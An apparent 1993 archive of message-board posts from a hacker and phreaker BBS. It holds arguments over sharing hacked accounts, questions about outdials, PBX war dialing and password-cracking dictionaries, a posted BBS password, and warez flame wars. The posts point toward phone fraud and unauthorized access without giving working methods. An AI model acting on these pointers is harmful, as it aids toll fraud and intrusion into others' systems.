moth@yabbs Fri Nov 5 04:01:12 1993 From: moth@yabbs To: xenon@yabbs Subject: re: Call overseas Date: Fri Nov 5 04:01:12 1993 Could you please explain a bit more ? I would also like some infos on PABX and PBX systems I'm not from the USA but Africa. Regards moth From horus@yabbs Fri Nov 5 06:03:14 1993 From: horus@yabbs To: Beetle@yabbs Subject: re: 818-447-2667 Date: Fri Nov 5 06:03:14 1993 I tried the BBS you mentioned, but I don't have the system password. Anyway you can give it to me? I'm starting a war dial on pbx's and would apprectiate any pbx crackers that are out there. Thanks Horus Min /\o/\ From jasonlee@yabbs Fri Nov 5 06:15:49 1993 From: jasonlee@yabbs To: carsenio@yabbs Subject: french stuff Date: Fri Nov 5 06:15:49 1993 Ou peut-etre: va-t'en a la bibliotheque! C'est tout, j'espere. JasonLee From jasonlee@yabbs Fri Nov 5 06:18:53 1993 From: jasonlee@yabbs To: all@yabbs Subject: Complaining about C Date: Fri Nov 5 06:18:53 1993 Well, I don't really like Natural Language Understanding. This assignment is just basically annoying, and its 5:19 AM, and I odn't feel like finishing. I'm not even too far from being done, but I'm tired, and I have to get up later this morning. gr. JasonLee From moth@yabbs Fri Nov 5 09:11:42 1993 From: moth@yabbs To: all@yabbs Subject: re: Member Wanted! Date: Fri Nov 5 09:11:42 1993 where does one signe up ? Got an Amiga 1200. Wanna get a 14.4k soon (if money permits). Live abroad. Cherio From pyro@yabbs Fri Nov 5 10:33:55 1993 From: pyro@yabbs To: binkley@yabbs Subject: re: accounts Date: Fri Nov 5 10:33:55 1993 Spare us the tirade on your giving out accounts. Do you realize how stupid it is for you to post such nonsense? Not only are you opening yourself up to a very large audience that you have illicit accounts, you might just be putting this BBS in jeopardy. Why don't you just come out and say: "Hey everyone, I have k00l accounts that are illegal but if you want them mail me and I will give them out..!!1!!11!!1!!!" I am not sitting on some high horse looking down at the hacking world, I am just looking down and the completey idiocy some people display. You should value such resources as this BBS and htoaster's time in writing it and supporting it, not abuse it with worthless garbage. Run yoour own damn BBS sometime that is this open and free and advertise that you give out free accounts on somone else's system and see how long it stays up. The bottom line? Think you moron. -The Pyro From Beetle@yabbs Fri Nov 5 12:06:09 1993 From: Beetle@yabbs To: horus@yabbs Subject: re: 818-447-2667 Date: Fri Nov 5 12:06:09 1993 The System Password is "TYBO CHEESE" for all it's worth, though... You still need an account there... just press APPLY and tell the sysop you got the number offa here, and you'll be taken care of... From Prism@yabbs Fri Nov 5 15:08:20 1993 From: Prism@yabbs To: Screamin@yabbs Subject: re: Date: Fri Nov 5 15:08:20 1993 What is ANI? From cosmos@yabbs Fri Nov 5 16:21:37 1993 From: cosmos@yabbs To: pyro@yabbs Subject: re: accounts Date: Fri Nov 5 16:21:37 1993 Good Shot I say!! Very well put chap! *grin* Cosmos From cosmos@yabbs Fri Nov 5 16:22:34 1993 From: cosmos@yabbs To: Prism@yabbs Subject: re: Date: Fri Nov 5 16:22:34 1993 ANI....Automatic Number Identification. Caller ID in layman terms. Cosmos From gurujam@yabbs Fri Nov 5 16:52:39 1993 From: gurujam@yabbs To: pyro@yabbs Subject: re: accounts Date: Fri Nov 5 16:52:39 1993 dear pyro: if these accounts are so dangerous, why do they let us have them? Also, it seens that many of us do not access to all the groups that are on this board. It is that you would prefer to have this information release d to a smaller audience, or just to save one's ass when the person get caught and points here? usage of these accounts is dangerous and it is possibly illegal that much of the information and pictures and lyrics we use from day to day on the internet. What we must decide is that having at most 30 people have access to the accounts, or just let them hack at these systems and take up bandwidth and cause others to lose their right to the site. I really don't care...but information is never free. in this world of hacking, any info is better than none. gurujam From griton@yabbs Fri Nov 5 19:37:50 1993 From: griton@yabbs To: htoaster@yabbs Subject: Yo! :) Date: Fri Nov 5 19:37:50 1993 Yo sysop.. I'm here... well, i entry qby x25 gateway.. i'm from Argentina South America.. it's a c00l board.. one ask.. exist elite area??? :) see ya El Griton/WL {/s From griton@yabbs Fri Nov 5 19:39:23 1993 From: griton@yabbs To: all@yabbs Subject: Virtual Machine Date: Fri Nov 5 19:39:23 1993 Hey guys! i hack a ystem with vm so any know how i can use the pad option? or to connct to another sites, with bitnet... which comands? tnxs. see ya El Griton From cosmos@yabbs Fri Nov 5 20:06:19 1993 From: cosmos@yabbs To: gurujam@yabbs Subject: re: accounts Date: Fri Nov 5 20:06:19 1993 Thank you for your post. Too bad it made no fucking sense at all. You are of the Intruder class of user, that much is evident. Pyro is 100% justified in his post and his post was crystal clear both in logic and in it's writing. Information should always be as free as possible, but k00l accounts are not (or should not be) considered such. That is the kind of stuff that will bring this board down and get the site in a shitload of trouble. Besides, handing out accounts is not hacking. If you want philanthropy check out your local k-RaD 3lit3 H/P board. Cosmos From xenon@yabbs Fri Nov 5 20:34:21 1993 From: xenon@yabbs To: moth@yabbs Subject: re: Call overseas Date: Fri Nov 5 20:34:21 1993 basically, a GOD allows you to call anywhere in the the barest sense, a session would be: call the GOD number and itll give ya a dialtone. from there, you can call anywhere...HOWEVER, its not that easy in practice... whatcha wanna know bout PBXs? jus what they are? --> Xenon From xenon@yabbs Fri Nov 5 21:21:04 1993 From: xenon@yabbs To: cosmos@yabbs Subject: re: accounts Date: Fri Nov 5 21:21:04 1993 what has happened to the world? why do people keep posting such BS? there is a generation of people growing up who, beacuse of the portrayal of a "hacker" by the media, aspire to do nothing more than break into systems for their own gratification and, more importantly, gain the respect of their misguided peers by passing on the reports of their / Xenon From Keman@yabbs Fri Nov 5 22:52:19 1993 From: Keman@yabbs To: all@yabbs Subject: hacking in general Date: Fri Nov 5 22:52:19 1993 ok here's the deal I know nothing of the nets....this is where I'm trying to learn I've kept my mouth shut and ears open but I havent seen one person post anything that would help me except for numbers that are out of state and text files and read read read....the last I have no problem with since I do it anyway... but it would help if I could find somone who know what the hell they're talking about and post it....sorry to be this way but I'm tired of people that have know ide )G<{of what hacking is posting lame if you know something useful it because I haven't seen you post anything but criticism...sorry this is not a personal thing just an observation from somone new... Sincerely, Keman From pyro@yabbs Sat Nov 6 03:08:43 1993 From: pyro@yabbs To: all@yabbs Subject: The World... Date: Sat Nov 6 03:08:43 1993 Let me just make a few opoints clear. I have been a member of the hack community for about 10 years now. I look back on such systems as Metal Shop Private, Speed Demon Elite, Atlantis, Safehouse, etc, etc, etc... with mucu nostalgia. But times have changed, and people have to realize that. There will never be anything like the old days. They are gone. Thats like saying you can bring back the 60's in todays world. It cannot be done. We are in a world where 100 times more people use computers and an electronic medium to communicate than in days past. because of this explosion in use steps must be taken to protect the few sites remaining to the masses at absotely no charge. Offering to give out hacked accounts to any schmo who would simply ask for them is ludicrous. It is a very good way to get one of these few precisou open forums that exist free of charge, namely this one, removed for good. Common sense is a trait that was alive back then, but seems to be dying these days. We did not simply log on to a public BBS back in the early 80's and say "Hey d00ds, I got accounts, mail me for some" and we should not start doing that today. This BBS could be used as a learning place for those who would like to understand the hack community, but its public nature will always prevent it from being a place to learn serious hacking information. The levels of intelligence are too far spread out. Only private, limited access systems will promote the distribution of illicit facts and figures. The bottom line is very simple, but I will repeat it again. This BBS is a great place to learn about the hack community, but do not be fooled in to thinking it is a forum for learning how to hack. You want to learn the how part of it all? I have one sure fre answer to help you out: START RE READING. I run a totally open and public BBS such as this, and I have a philosophy that I am sorry to say is coming true: SPOON FEEDING. If you truly aspire to learn anything and to retain and build upon such knowledge you must take the initiative and learn it your self, you cannot expect people to spoon feed you everything you need to know. Xenon: I think you need to spot thinking of it all as some political crusade against the, as the kiddies here in 612 put it, Evil Pig Empire. And everyone must realize that there will be no revival, there will be no return to the old days. They are gone. You cannot simply compare today with the past. The situations are totally different. I just like Phred, and I would love to see it stay up and grow. Htoaster has put too much time in to it to have it degenerate in to some spoon feed session on hacking... Read back a few hundred messages, he said this. I must also say there is nothing wrong with serious discussion on software design or problems. This type of discourse enlightens those intelligent enough to follow it. Anyway, this is a long post. And I am sure some people will whole heartedly disagree with me. Fine, it is your right to do so. Just do it intelligently. -The Pyro From xenon@yabbs Sat Nov 6 13:48:31 1993 From: xenon@yabbs To: pyro@yabbs Subject: re: The World... Date: Sat Nov 6 13:48:31 1993 ok, pyro. im not tryin to get back the old dayz. i guess my posts sort convey the idea that im lookin back and sayin, "why cant it be like it wuz." i know times change and that change is necessary. since we live in an explosive time, meaning technology is changing at such a fast rate, i see the current change as a chaotic mess. now, if ya wanna get into a discussion of the values of chaos and anarchy, go ahead. im not sayin its good or bad right now. i dunno. what i am tryin to say, though, is that people need to understand their roots. history has a way of repeating itself since people dont look at the pst and learn from others mistakes. ive never been one for history...i alwayz blew it off as unimportant, but now, i am startin to realize that history is VERY important and i guess that my main concern and why i keep talkin bout the old dayz...not to bring em back, but so people will read about the past and mebbe gain an understanding, or more so, learn from the past and apply that knowledge to work towards the future. everyone has their own personal goals they are workin towardz. this is good. this is diversity that is needed. even people striving towards the same sort of goal have different perspectives of what theyre workin to achieve. im not lookin fer a world full of cookie-cutter people all holding the same ideas. add yer own flavoring to the soup and make it better for yerself. WaReZ d00dz, cardersc0de headz, whatever, they all have their place. im not passing judgement on anyone...i feel that if ya start to pass judgement and catagorize people, yer closin yer mind to the ideals of others. that is why i ran a totally anon, free to all bbs (and will again when i get a new HD). i wanted to provide a relaxed atmosphere where people could post their ideals and read the ideals of others. well, this is sorta a hodge-podge post...forgive me...jus whaen i talk bout the "good ol dayz" im tryin to awaken people to the past so they might get interested and read and learn from it. im not sayin what a hacker SHOULD be...thats different from person to person. im jus sayin that there are a lot of definations out there and mebbe someones ideas might awaken somethin in you and add more flavor to yer life and ideals. well, before i ramble on more...l9er --> Xenon From binkley@yabbs Sat Nov 6 16:53:34 1993 From: binkley@yabbs To: pyro@yabbs Subject: re: The World... Date: Sat Nov 6 16:53:34 1993 Well, one way to learn is by experiance. if you give people a place to go, and use an account to play around with. they can telnet to sites, and play around without worring about having their account closed because of suspicious activity. You are right, read, and learn as much as you can, but learning is best inforced by uusing what you know... OQ Binkley From cosmos@yabbs Sat Nov 6 16:59:55 1993 From: cosmos@yabbs To: binkley@yabbs Subject: re: The World... Date: Sat Nov 6 16:59:55 1993 Wrong. That is no justification for handing out accounts on phred. Cosmos From xenon@yabbs Sat Nov 6 17:01:23 1993 From: xenon@yabbs To: binkley@yabbs Subject: re: The World... Date: Sat Nov 6 17:01:23 1993 i have no problem with sumone giving out an account so sumone can learn from it...jus tell em to use the account wisely and theyll probably to be able to keep it for a while... --> Xenon From xenon@yabbs Sat Nov 6 17:09:34 1993 From: xenon@yabbs To: xenon@yabbs Subject: re: The World... Date: Sat Nov 6 17:09:34 1993 oh, i ment passing out accounts in a private place...not on a public bbs like this one...definately not /. swami From binkley@yabbs Sun Nov 7 11:17:20 1993 From: binkley@yabbs To: xenon@yabbs Subject: re: The World... Date: Sun Nov 7 11:17:20 1993 There isn't a way to get in trouble on there, unless they're dumb enough to mail Admin telling them to f*&k off or omething like that. it's not a unix, and there isn't anything that can be destroyed. it's just a place to telnet from, if you don't want to be logged as you... OQ From pyro@yabbs Sun Nov 7 13:26:46 1993 From: pyro@yabbs To: all@yabbs Subject: Look... Date: Sun Nov 7 13:26:46 1993 I am just saying people need to be more aware of their actions. Advertising the fact that you will give out illegal accounts if you mail me (wait, thats confusing...). Anyway, you get the point. You never know who is just waiting for a reason to get people in trouble. You cannot sit there and offerto give out accoutns to a system you do not own on a public BBS. Simple. From Graf@yabbs Sun Nov 7 15:29:03 1993 From: Graf@yabbs To: all@yabbs Subject: Tempest Date: Sun Nov 7 15:29:03 1993 Does anyone know where I can get any info about Tempest, also known as a Van Eck detector, which is a device that allowes you to monitor the electromagnetic emissions from computers and other electronic devices. I fournd the one file on EFF, are there more? Thanks. From maestro@yabbs Sun Nov 7 16:54:41 1993 From: maestro@yabbs To: all@yabbs Subject: The Shits Date: Sun Nov 7 16:54:41 1993 This Is Definitely The Shits, I Completely forgot about this system until today, which i havent logged on for a while, and I read some of the messages, and i see peopl trying to be elite, and think they can hack and phreak, sure anyone can hack/phreak if they try, but all these people are just leaching and not even Hacking or PHREAKING. Wow! I just figured out how to dialout! I'm a Hacker! Probably the problem is, that this can be accessed by ANYONE, You see In My Area Code, It is probably the most shittiest, There are maybe 5 people in my area code that have Unix Accounts and would be able to access things because they would fuck things up royally, Makling my point, If someone gets a freenet installed in their town, that means more idiots get access and try to fuck things up for us i was reading about sites here, and whoever was giving them out was a bad idea, If a Law Enforcement Agency Got A Hold of What You just said and if you posted one, this entire system would go down, now wouldn't you feel bad? Probably not, You Would Probably Pat Yourself on the Back, For TAKING down a good BBS For the Public, and think to yourself 'Oh Boy, At least I never got Busted'. Anyone asking how to hack and phreak, I suggest You find out for yourself, I found everything I needed to Know By Learning the ropes of the system, sure, when i came into the modemmings scene in 1986, I was a WaReZ R0DenT, thinking I was Awesome. I then went on to Think I was COOL and accepted because I was in groups and etc, until finally i realized, they are stupid, and to find out more information you learn to go solo, and find out things for yourself, not by asking people for Accounts, password files, and other lame shit. Basically my point is, Learn Yourself And Dont Be a Leech. Oh yeah. P.S. - Cut the K-RAD elYte WarezWorDz NiFTy shit. Read A Dictionary. Maestro From cosmos@yabbs Sun Nov 7 16:59:29 1993 From: cosmos@yabbs To: maestro@yabbs Subject: re: The Shits Date: Sun Nov 7 16:59:29 1993 heh 86?? Interesting. I started my warez crap in 83 and ventured into the net scene during late 1985...I even remember getting my first text file from a guy on a local CHicago board...I really do thank Craig Nierdorf for the good times. Good points...I doubt they will listen. Cosmos From Alvin@yabbs Sun Nov 7 17:02:07 1993 From: Alvin@yabbs To: comrade@yabbs Subject: re: AWA Date: Sun Nov 7 17:02:07 1993 you loser. you suck. From cosmos@yabbs Sun Nov 7 19:37:27 1993 From: cosmos@yabbs To: Alvin@yabbs Subject: re: AWA Date: Sun Nov 7 19:37:27 1993 Okay, I read the AWA post. I agree, warez is a pathetic phenomena but also feel the society(AWA) and documents dedicated to bashing it is childish and accomplishes nothing. However, if you want to flame him for the post, please take it to private e-mail, as I and others do not wish to read a private "you lamer" type war on the public boards. Cosmos From graph-x@yabbs Mon Nov 8 01:14:58 1993 From: graph-x@yabbs To: Keman@yabbs Subject: re: hacking in general Date: Mon Nov 8 01:14:58 1993 Could you by any chance be Keman-R-HOT-4? From horus@yabbs Mon Nov 8 18:01:12 1993 From: horus@yabbs To: all@yabbs Subject: sleepy Date: Mon Nov 8 18:01:12 1993 I knew it! you guys can't be trusted. Well the sleepy guest account is no more! If I ever see another post for a machine that I have an interest in, I'm g oing to ask toastie to delete it. :( From m-intent@yabbs Mon Nov 8 18:17:04 1993 From: m-intent@yabbs To: all@yabbs Subject: Therion's PW Utility. Date: Mon Nov 8 18:17:04 1993 I heard a rumor from someon on IRC that a UNIX utility exists called "Therion's PW Utility." I guess that it's from denmark. I have never seen any of it around, and I would like to taker a look at it sometime... Any of you have it? And, also : a good batch of dictionaries exists on in the doc/dictionaries directory.. Those of you into UNIX security may want to check those out. Also, what other FTP sites are any oggd these days? dictionaries, etc.. drop me a line.. -Malicious Intent From schief@yabbs Mon Nov 8 18:26:05 1993 From: schief@yabbs To: horus@yabbs Subject: re: sleepy Date: Mon Nov 8 18:26:05 1993 no, it's still there, just some smartass decided "gee, i think i'll change the password so only i can get in", because someone logged in yesterday afternoon and this morning too... From Cratar@yabbs Mon Nov 8 18:40:58 1993 From: Cratar@yabbs To: horus@yabbs Subject: re: sleepy Date: Mon Nov 8 18:40:58 1993 what happened to that.... i was going to logon for the fun of it, but it wouldnt let me..... i thought it was nifty to be able to l loggon to another vax. I was actually going to try to telnet to phred from there.... oh well...... Mity Cratar (After 1 year i finally post!!!! ) From johndeer@yabbs Mon Nov 8 21:01:38 1993 From: johndeer@yabbs To: all@yabbs Subject: stuff Date: Mon Nov 8 21:01:38 1993 graf: you have your terms slightly off.. to TEMPEST a machine is to PREVENT its RF emisisons from being picked up by a Van Eck... m-intenet: Therion's Password utility is basicaly a dictionary manipulator.. it sorts, convert case, etc. it's probbaly better than the ones provided with KC or crackerjack. and it can handle very large dictionaries by using man swap files, etc.. check out (ftp) form some more dictionaries. jasonlee and the other guy talking aout telnet 25: pardon myh ignorance.. but is it really efficient for sysadmins to log all outoing telnets? on large systems with many users, i'd image the log would be huge in just one day... also, th HELO is passed inthe mail as well? i thought you'd just get the RCPT TO: and the from.. john Deere From jasonlee@yabbs Mon Nov 8 23:25:58 1993 From: jasonlee@yabbs To: johndeer@yabbs Subject: re: stuff Date: Mon Nov 8 23:25:58 1993 Well, about port 25, the sysadmins here are rather touchy about the security of the system, so the watch people pretty well. Actually, about half the time I send mail to that system via port 25, it doesn't ever get through! I'm pretty positive I'm doing everything right, so I don't know what's causing it other than sysadmin activity? Strange system? Something else? JasonLee From horus@yabbs Mon Nov 8 23:27:45 1993 From: horus@yabbs To: johndeer@yabbs Subject: tempest Date: Mon Nov 8 23:27:45 1993 TEMPEST also comes in a wallpaper. Caps,coils, and all. From xela@yabbs Tue Nov 9 02:58:41 1993 From: xela@yabbs To: cosmos@yabbs Subject: toronto dial-out Date: Tue Nov 9 02:58:41 1993 Without trying to sound like a newbie, I have seen the telnet address for a dialout in Toronto and mention of an anonymous dial-out from JHU. Is this Johns hopkins university? I go there and have not heard of any dial-out, at least on this section of the campus. Anyway, see ya. Alex From cosmos@yabbs Tue Nov 9 06:05:49 1993 From: cosmos@yabbs To: griton@yabbs Subject: re: Virtual Machine Date: Tue Nov 9 06:05:49 1993 Yes, thank you for informing me, I would have never known that. (The above post is dripping with sarcasm, people read who writes the original question, for it sure as hell was not me asking about VM.) Cosmos From binkley@yabbs Tue Nov 9 10:15:33 1993 From: binkley@yabbs To: all@yabbs Subject: ... Date: Tue Nov 9 10:15:33 1993 I don't see why people who are into warez, and people who are into H/P/A can't get along. Warez groups make software free for all, and what the hell is wrong with that?!?! BUt why can't both worlds get along. H/P/A want's information, and access to be free, both groups are working against each other half of the time.. always bickering, you fucking warez puppy, you elite fuck! KoDe KiDz! Yuch! get over it! Also I would like to appologize, I didn't figure I was putting this BBS in danger of being closed down... sorry binkley From wonko@yabbs Tue Nov 9 13:25:17 1993 From: wonko@yabbs To: xenon@yabbs Subject: re: accounts Date: Tue Nov 9 13:25:17 1993 clap clap clap clap clap you can have the soapbox whenever you want it. -wonko From wonko@yabbs Tue Nov 9 13:28:50 1993 From: wonko@yabbs To: pyro@yabbs Subject: re: The World... Date: Tue Nov 9 13:28:50 1993 clap to you too. i can not say that i desagree with you, but i cannot say i agree 100% with you either. if we would take your posts and xenon's posts and merge them, i think we have my standing on the situation. -wonko From wonko@yabbs Tue Nov 9 13:40:51 1993 From: wonko@yabbs To: wonko@yabbs Subject: VM Date: Tue Nov 9 13:40:51 1993 trying to do anything from VM is a waste of time really. -wonko From wonko@yabbs Tue Nov 9 13:46:02 1993 From: wonko@yabbs To: all@yabbs Subject: Sun Security Date: Tue Nov 9 13:46:02 1993 ok, like i said, i will be getting a sun, i think it will be running SunOS 4.1.1 so any security info you have would be great. my sysadmin on fubar is a security nut so i will always have his input, but he was never much of a hacker. so he never got to experience it from the other side. i am asking you seasoned vertrans to help me out with possable security loop holes that we may overlook. thanks, -wonko From cosmos@yabbs Tue Nov 9 14:13:39 1993 From: cosmos@yabbs To: binkley@yabbs Subject: re: ... Date: Tue Nov 9 14:13:39 1993 Warez is lame. If you want to trade software, fine do it. But fucking elitist boards with 0-3 day warez and people having to beg to get on the stupid lame boards is what is my gripe. Do not compare the two, there is no greatness in warez, there is no talent, any dork can be a warez kiddie. Warez can suck my dick. Cosmos From jasonlee@yabbs Tue Nov 9 14:19:11 1993 From: jasonlee@yabbs To: xela@yabbs Subject: re: toronto dial-out Date: Tue Nov 9 14:19:11 1993 Hey, a fellow Hopkins guy. Well, the dial-out is still there, but has never worked (at least not to my knowledge, and I was probably the second person to find out about it). Anyway, we've got some neat stuff hidden around our little ISN bridge stuff... If you'd still like to find the dialout, think decnet (hint). JasonLee From jasonlee@yabbs Tue Nov 9 14:24:12 1993 From: jasonlee@yabbs To: binkley@yabbs Subject: re: ... Date: Tue Nov 9 14:24:12 1993 Well, I think the problem is that most (or a lot) of the warez puppies think they are super hot shit cuz they just downloaded the newest game. This doesn't take much skill. Warez guys who say they're "pirating cuz they don't like the big corporations, and they think info should be free" and all that shit, are fooling themselves. Actually, a lot of the same goes for the HPA people, a good deal of whom think that having a passwd file means you're a hacker-elite. It's nothing, and it will only get you so far in a quest to understand computer systems. I say all this from personal experience (I used to be both, but not to some extreme). A whole mess of the people I met while being an elite (HPA or warez) were basically supreme assholes. No one was nice, and I got tired of it. People like that rarely get along, so you get all kinds of fighting amongst the two groups. It's pretty simple. JasonLee From griton@yabbs Tue Nov 9 18:19:24 1993 From: griton@yabbs To: cosmos@yabbs Subject: tnxs! Date: Tue Nov 9 18:19:24 1993 tnxs! man! where r u from? I'm callig from Argentina.. Sud America! (The Best Country! :) If you need anything about h/p world.. tell me.. take care.. bye El Griton From griton@yabbs Tue Nov 9 18:22:22 1993 From: griton@yabbs To: wonko@yabbs Subject: re: VM Date: Tue Nov 9 18:22:22 1993 Yo.. are you calling from one Vm s.o? tell me how you can use the pad? and how i can connect to anotehr computers.. with the bnitnet net.. tnxs! el Griton From NetCo@yabbs Tue Nov 9 21:10:10 1993 From: NetCo@yabbs To: all@yabbs Subject: Info. Internet Date: Tue Nov 9 21:10:10 1993 Hi all !! I have some questions : - Any1 knows other Internet H/P BBS's ? - Any12 know others programs to send Internet BUGS , like ISS ? Thnks. for all!! From cosmos@yabbs Wed Nov 10 05:41:58 1993 From: cosmos@yabbs To: all@yabbs Subject: re: Info. Internet Date: Wed Nov 10 05:41:58 1993 People, that is a classic message from your typical moron. TOo bad he does not exist anymore or I would flame him. Internet bugs with ISS?? Fuck off dork. Cosmos From wonko@yabbs Wed Nov 10 09:06:13 1993 From: wonko@yabbs To: griton@yabbs Subject: re: VM Date: Wed Nov 10 09:06:13 1993 never bothered with bitnet, always used the internet address. of course i do not connect to other systems with the VM machine since it is a piece of shit and i have this nice vt102 term infront of me. -wonko From wonko@yabbs Wed Nov 10 09:06:59 1993 From: wonko@yabbs To: cosmos@yabbs Subject: re: Info. Internet Date: Wed Nov 10 09:06:59 1993 some people, it is amazing, isn't it?? -wonko *sigh* at least he was deleted. From hbeast@yabbs Wed Nov 10 11:04:07 1993 From: hbeast@yabbs To: all@yabbs Subject: misc Date: Wed Nov 10 11:04:07 1993 General stuff: Phrack 44 should be out at Nov. 17. Got the bounce test some time ago. Another general note: with the paranoia going around about the "new" sendmail bug, I think it would be wise not to tinker with sendmail too much (at least, for all those of you who are just trying to fake mail). People can be so anal... herd beast From jasonlee@yabbs Wed Nov 10 12:51:58 1993 From: jasonlee@yabbs To: all@yabbs Subject: Dumb guy... Date: Wed Nov 10 12:51:58 1993 Hey, does anyone know who a guy named John M Nowakowski ( is? I don't know him, but he sent me some fucked up uuencoded file in the mail. I thought it might contain a .rhosts file, but it was just gibberish. What a freakish attempt at hacking my account. If anyone has ever met him, ask him what the hell he was trying to do. JasonLee From jasonlee@yabbs Wed Nov 10 18:49:55 1993 From: jasonlee@yabbs To: all@yabbs Subject: Complaints about strings Date: Wed Nov 10 18:49:55 1993 Damn, I'm just having an annoying time getting a stupid program to work. I'm no C god, so I'm in normal C I. Linked lists are so fun, but for some reason when I change the data type of each node from int to char *, each time I add a node, the data in each of the other nodes is replaced by the new value. So instead of having a list of {time} then {help, time} I get {time, time}. I can find no reason for this, but if anyone would like to berate me for missing some amazingly obvious point, I'd be happy to accept your attacks. E-mail me here or at Thank youse so very much. JasonLe er, JasonLee From LoA@yabbs Thu Nov 11 01:40:26 1993 From: LoA@yabbs To: all@yabbs Subject: I need some help.. Date: Thu Nov 11 01:40:26 1993 the server I'm using to call out (Harvery Mudd, CA) is rather weak, no FTP, or FINGER.... and I am in DIRE need of a dial up in the 909/714 area.. if anyone can help me...... PLEASE do, will trade info or ??? if needed From binkley@yabbs Thu Nov 11 18:16:31 1993 From: binkley@yabbs To: cosmos@yabbs Subject: re: ... Date: Thu Nov 11 18:16:31 1993 What the hell do you mean it takes no talent?! coding your own game loaders, isn't easy... Breaking copy protection is no easy task either, removing DOC checks, and stuff like that, you're such a fucking no-it-all can you do stuff like that?! From griton@yabbs Thu Nov 11 19:54:16 1993 From: griton@yabbs To: cosmos@yabbs Subject: re: tnxs! Date: Thu Nov 11 19:54:16 1993 {yo! c00l, you are here since 85???? heheh. well, im new.byq. coz i;m stay here since 91.. :) chicago? usa? nice city, no? you can't use box? no? or you can call sprint-net dials?// From griton@yabbs Thu Nov 11 19:59:20 1993 From: griton@yabbs To: wonko@yabbs Subject: re: VM Date: Thu Nov 11 19:59:20 1993 tnxs... man... but in vm? whcih is teh command? to connect to anotehr system's? From Alvin@yabbs Thu Nov 11 20:29:39 1993 From: Alvin@yabbs To: all@yabbs Subject: .. Date: Thu Nov 11 20:29:39 1993 is anyone calling from Denmark? if so, email me. thanks. Alvin From pyro@yabbs Fri Nov 12 03:45:45 1993 From: pyro@yabbs To: binkley@yabbs Subject: Warez d00d Date: Fri Nov 12 03:45:45 1993 Fact: very few people can accomplish such things. The few that do are not the representation of the wwarez world that everyone sees. they do have some talent in a special field (however, making VGA loaders is still lame and worthless). But tthe other 99.9% of the warez world is the 15 year old kid who thinks he is hot shit because he has X-Wing and Daddy's 486 and 14.4 modem. These kids abuse anything they get. They openly beg for accounts, codes and sites. They are annoying and should be shit. Simple. -TP From cosmos@yabbs Fri Nov 12 05:15:03 1993 From: cosmos@yabbs To: binkley@yabbs Subject: re: ... Date: Fri Nov 12 05:15:03 1993 Come off it Binkley. Yes, I have done that. I was once a "pirate" too, long time ago....long time ago. It does not take very much talent, a simple knowledge of assembly and machine language and a sector they have even more powerful tools. Do not condescend me with that crap about being really tough to be a software pirate. Oh, I forgot to mention how elite being a pirate is....K-RaD. Cosmos .s From cosmos@yabbs Fri Nov 12 05:15:54 1993 From: cosmos@yabbs To: griton@yabbs Subject: re: VM Date: Fri Nov 12 05:15:54 1993 Um...try telnet....just a guess.... Cosmos From wonko@yabbs Fri Nov 12 10:08:34 1993 From: wonko@yabbs To: cosmos@yabbs Subject: re: VM Date: Fri Nov 12 10:08:34 1993 i was going to suggest the same thing, hold on, let me try something. -wonko From wonko@yabbs Fri Nov 12 10:12:13 1993 From: wonko@yabbs To: wonko@yabbs Subject: re: VM Date: Fri Nov 12 10:12:13 1993 shit, anyway, someone give me aa machine on bitnet. i can try it myself then. -wonko From griton@yabbs Fri Nov 12 18:42:04 1993 From: griton@yabbs To: cosmos@yabbs Subject: re: VM Date: Fri Nov 12 18:42:04 1993 heheh :) i wqas try.. and nothing.. coz the system. it's af.wn old system, i dunno, why, i was read about bitnet in the files... i'll investigate.. are you study anything? i study computer science.. 1st year.. :(.. From Alvin@yabbs Fri Nov 12 22:16:38 1993 From: Alvin@yabbs To: all@yabbs Subject: .. Date: Fri Nov 12 22:16:38 1993 does anyone know what an extender is? any help will be appreciated. Alvin email me at: From B-Chrome@yabbs Sat Nov 13 11:24:48 1993 From: B-Chrome@yabbs To: all@yabbs Subject: re: H/P & Scaners/hacking Date: Sat Nov 13 11:24:48 1993 That board that jcjc was talking about - Piracetam - is in Tampa, FL... It is the ECP Information HQ for anyone that was around in the mid to late 80's and knows what the ECP is... There's no NUP on it and if you are looking for information, it does indeed have it! The SysOp is a long time Hacker and Phreaker and knows a hell of a lot... But of course he's not willing to share to easily... The number is (813) 996-3902 and is 14.4k... Pretty cool software he runs too... Check it out at least once, as Piracetam is a very potent smart drug and you might find yourself becoming addicted to it after a short while... From rcb@yabbs Sun Nov 14 13:14:19 1993 From: rcb@yabbs To: all@yabbs Subject: AUDIX Date: Sun Nov 14 13:14:19 1993 I've been messing with Sys75's lately, and I see PBX's set up on AUDIX systems. The only thing is, I don't know how to recognize one. Any help here is appreciated. Ratscabies From pooper@yabbs Sun Nov 14 21:03:54 1993 From: pooper@yabbs To: ldistort@yabbs Subject: re: toneloc Date: Sun Nov 14 21:03:54 1993 look on archie for it.... (use telnet and use find toneloc) From pyro@yabbs Mon Nov 15 06:03:38 1993 From: pyro@yabbs To: rcb@yabbs Subject: Sys75 Date: Mon Nov 15 06:03:38 1993 There is a newsltter/exine out called Cult of the New Order (cotno), they only have 1 issue out, but it has a fairly good file on System75 use. It has caotures and the whole 9 yards. (its the only thing in the zone that is any good). Anyway, look around for it. I saw it on some BBS. If I find it I will FTP it here, but ask around. Someone should have it. -Pyro From savoire@yabbs Mon Nov 15 15:49:59 1993 From: savoire@yabbs To: all@yabbs Subject: Learning Date: Mon Nov 15 15:49:59 1993 The most dangerous attitude expressed here is "go get a book and learn by yourself." This is completely contrary, in my view, to the free exchange of information. Remember earlier in the thread, when everyone was talking about newbies on HPA boards? The greatest statement coming out of that was that these boards are a great place to learn and to exchange ideas. I agree with the specific complaint that idiots arbragging and handing out accounts which were not procured legitimately, an illegal enterprise that threatens the system. However, I think that discussions on security holes in Unix, ways to sneak through telnet-watchers, mailing anonymously are all discussions that are perfectly valid, and I would encourage them. To say "get out of here and read a book" is not conducinve to the free atmosphere. Basics get acquired pretty quickly, and the goal of a hacker is ewxploring. Let's support this goal by stopping the idiotic brag/rag wars, and equally stopping the massive posts on why everyone hates newbies / w3r3z d00dz etc. Instead, let's talk about how to make the most of the internet. Relinquishing the soapbox... From cosmos@yabbs Mon Nov 15 15:54:13 1993 From: cosmos@yabbs To: savoire@yabbs Subject: re: Learning Date: Mon Nov 15 15:54:13 1993 Eat shit moron. My posts were justified. Read them and see WHY we sent them to read up. Cosmos From B-Chrome@yabbs Mon Nov 15 16:40:46 1993 From: B-Chrome@yabbs To: savoire@yabbs Subject: re: Learning Date: Mon Nov 15 16:40:46 1993 Amen! Something I have believed in since joining the ECP! in 1986... FREEDOM OF INFORMATION! Granted, I don't spend a lot of time educating the up and coming 